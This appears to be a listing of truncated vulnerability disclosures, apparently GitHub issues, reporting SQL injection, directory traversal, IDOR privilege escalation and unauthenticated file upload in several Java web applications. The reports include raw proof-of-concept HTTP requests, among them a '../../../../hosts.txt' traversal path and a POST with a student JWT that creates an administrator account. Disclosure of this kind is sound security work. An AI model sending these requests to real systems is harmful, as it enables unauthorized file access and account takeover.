x0blank

SQL injection vulnerability in linlinjava litemall v.1.8.0 allows a remote attacker to obtain sensitive information via the goodsId, goodsSn, name parameters of the AdminOrderController..java component. 1.Steps to reproduce (复现步骤) 访问商品管理，昵称输入1...

[vulnerability] Directory traversal Vulnerability in UploadController.java

3

Directory traversal Vulnerability in UploadController.java  `GET /upload/file/2024/11/20/1859180710022115329.png/../../../../hosts.txt HTTP/1.1 Host: localhost:8101 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111...

IDOR vertical overreach Vulnerability in ExamController.java 1.Log in with student privileges，Get low-privilege user cookies  `token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE3MzIxOTYzMDAsInVzZXJuYW1lIjoidGVzdCJ9.ncdRy80InTK5kEbchFSKwHVXz5SnxjpoKlAyxGmtZ4Y` 2.Vulnerability interface Adding an Administrator Account  `POST /exam/api/sys/user/save HTTP/1.1 Host: 192.168.4.221:8101 Content-Length:...

[vulnerability] Unauthorized file upload Vulnerability in UploadController.java

1

UploadController.java Unauthorized file upload  No permission verification `POST /tianti_module_admin_war/upload/ajax/upload_file HTTP/1.1 Host: 127.0.0.1:8080 Content-Length: 182 Cache-Control: max-age=0 sec-ch-ua: sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "" Upgrade-Insecure-Requests: 1 Origin: http://127.0.0.1:8000 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryr0IMnvEkpJQueVY9 User-Agent:...